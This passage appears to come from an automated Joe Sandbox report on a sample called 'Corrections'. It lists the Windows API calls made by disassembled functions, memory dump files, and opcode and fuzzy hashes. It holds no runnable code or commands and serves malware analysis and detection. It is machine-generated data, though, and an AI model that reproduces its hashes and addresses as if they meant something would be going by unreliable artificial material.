                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d530a7ce761dec0c62fe0d3f88ceb92ddef751e4eb068c9e81d4d0031c94c4d8
                                                                                                                                                                                                                                                                                            • Instruction ID: d62b22751eac99a54060e2c346303f94439224ddc0835574421c447fa838cd6d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d530a7ce761dec0c62fe0d3f88ceb92ddef751e4eb068c9e81d4d0031c94c4d8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1921A131209521AFD714DB24C945FAABB99AF85334F24C258F8268B2D2CB75ED81CBD0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?), ref: 009896F3
                                                                                                                                                                                                                                                                                              • Part of subcall function 009896E4: lstrcpyW.KERNEL32(00000000,?,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 00989719
                                                                                                                                                                                                                                                                                              • Part of subcall function 009896E4: lstrcmpiW.KERNEL32(00000000,?,00988271,?,000000FF,?,009890BB,00000000,?,0000001C,?,?), ref: 0098974A
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 0098828A
                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 009882B0
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,009890BB,00000000,?,0000001C,?,?,00000000), ref: 009882EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                            • Opcode ID: 187f525c6a73d9148856a8aa5fb53118ba68dee7f8759d05ed2e5ba7bbdf1dc7
                                                                                                                                                                                                                                                                                            • Instruction ID: 17c10249c1b883322e09c4656a079cfe503b3c4eb61254433be9ff7f48a4f2a6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 187f525c6a73d9148856a8aa5fb53118ba68dee7f8759d05ed2e5ba7bbdf1dc7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF11D33A204242ABCB15AF78D845E7B77A9FF897A0B50412AF942C7350FF31D811D7A1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 009B615A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B616C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009B6177
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 009B62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b7616a3ba437a376e0f66f91a4155b3b6d515f0236e497ebf20cac1c4fb08c23
                                                                                                                                                                                                                                                                                            • Instruction ID: e422657e75a8992cb5c693520fed22d1a5df4bb544f25ac631d4c62cad3e8025
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7616a3ba437a376e0f66f91a4155b3b6d515f0236e497ebf20cac1c4fb08c23
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1110071610208A6DB20DFA48EC4FFF7BBCEB55370B14452AFA11D6081EB78D940CB60
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: c992b56b81c577e53417c5190acf2d3a5ed165ea6c27374b3c30ac86360d5ec3
                                                                                                                                                                                                                                                                                            • Instruction ID: aa860c179741796d91a86d258652dc9932c219ac4e8350e8253faaa5370f70b0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c992b56b81c577e53417c5190acf2d3a5ed165ea6c27374b3c30ac86360d5ec3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C701A7B221B2167EF621A77E6CC0F27671DDF9237AB300725FD21951D1EA608C489360
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00982394
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823A6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823BC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009823D7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a9df8ec471ba332d87c15d8803d4089024d8c9860092c5386105ee720ab2a65
                                                                                                                                                                                                                                                                                            • Instruction ID: 9f2b09db96d16074b8564af34e123d0c3490b4b808b78642d458021ccd425427
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9df8ec471ba332d87c15d8803d4089024d8c9860092c5386105ee720ab2a65
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA110C7A901218FFDB119B95CD85F9DBB78FB08750F200096E601B7290D671AE10DB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00921AF4
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 009631F9
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00963203
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0096320E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b232be340b0317d3fdb367a999f9528f7ec6f82c19c730f283e000181c03cb1
                                                                                                                                                                                                                                                                                            • Instruction ID: 4cf7a72edb7561670deffa3021b813088d89d90708c82c8eb52281cf4a8f6897
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b232be340b0317d3fdb367a999f9528f7ec6f82c19c730f283e000181c03cb1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85118C31A05029EBCB10DFA8EA469FE77B8EB45350F104552F902E3140D770BA91DBA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0098EB14
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0098EB47
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0098EB5D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0098EB64
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a29cc21d5a79ba5d56237b5b490e96f1a1e34c5f71214075f14dfac3bdbeabcc
                                                                                                                                                                                                                                                                                            • Instruction ID: 7d57c1879c717b4ce906c2811e10e71f332029281dd42aeffa7256a5e11cc82e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a29cc21d5a79ba5d56237b5b490e96f1a1e34c5f71214075f14dfac3bdbeabcc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F31126B691C218BBC701ABA89C05B9F7FADAB45320F004216F816E3390E6B4C90497A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,0094D369,00000000,00000004,00000000), ref: 0094D588
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094D594
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0094D59B
                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 0094D5B9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 72400755c531520a6097ae1ad343ee3d7835f8d89f6d3d18857bfe43c35aa7b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 0977c63494ed21082dd655c6bd51def529a785219a4d711dbc556572fd7fcf29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72400755c531520a6097ae1ad343ee3d7835f8d89f6d3d18857bfe43c35aa7b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2301F93A4161147BDB246FA5DC09FAE7B6CEF81339F100319F925861E4DF708800D6A1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 009278C5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2503e701ef55793b35bc71bb3f740667c967e580ef868fd97d9d87d96faf9d4f
                                                                                                                                                                                                                                                                                            • Instruction ID: ed289dd940fc9cbb6a40b502221f295990cc5bcbdd9531592147170e51b989a4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2503e701ef55793b35bc71bb3f740667c967e580ef868fd97d9d87d96faf9d4f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A511AD7250A119BFDF065FD0EC98EEABB6DFF48364F040215FA0062120D7319C60EBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue), ref: 00953418
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue,009C3260,FlsSetValue,00000000,00000364,?,009531B9), ref: 00953424
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0095338D,00000364,00000000,00000000,00000000,?,009535FE,00000006,FlsSetValue,009C3260,FlsSetValue,00000000), ref: 00953432
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3fb923cba2aab3e9b1ab329d19ca7f9e6f3a6d8cbdf92892dbb370989382016e
                                                                                                                                                                                                                                                                                            • Instruction ID: 3e4fd6135804ef4b4752e16ab84056a19e01fa6a182611fa3bab2f8062240540
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fb923cba2aab3e9b1ab329d19ca7f9e6f3a6d8cbdf92892dbb370989382016e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE01D432626222ABCB22CF7A9C449563B9CAF04BF27208620FD06D71A0D735DD05C7E0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BA8B
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BAB0
                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BABA
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0098B69A,?,00008000), ref: 0098BAED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 110667ea0a411503f0dda0c26e7d83a97d9424d92b824f19dae5abb8c4014b25
                                                                                                                                                                                                                                                                                            • Instruction ID: ab67173b499048490041abaf1795d407b8b5b95dfa5948bf140f8fecb242bf50
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 110667ea0a411503f0dda0c26e7d83a97d9424d92b824f19dae5abb8c4014b25
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A118E75C0951DDBCF08EFE8E948BEEBBB8BF09711F140185D541B2240DB309650DB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 009B888E
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 009B88A6
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 009B88CA
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009B88E5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4cbf721129c1b494dd0f3718fec7d5a125f7c451cf37301dd8c4342eae8aa7d1
                                                                                                                                                                                                                                                                                            • Instruction ID: 5501c2dd9e952c379e0b066886775559c92754f6992714ff5007eee1ae830f91
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cbf721129c1b494dd0f3718fec7d5a125f7c451cf37301dd8c4342eae8aa7d1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 241174B9D01209EFDB01CF98C9849EEBBF9FB08310F104156E915E3210E735AA50DF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00983712
                                                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00983723
                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0098372A
                                                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00983731
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2d9f8fe2e0ce7c5caf80a412d6650085a7d6ad252c733ee2c3c67950e7e64e18
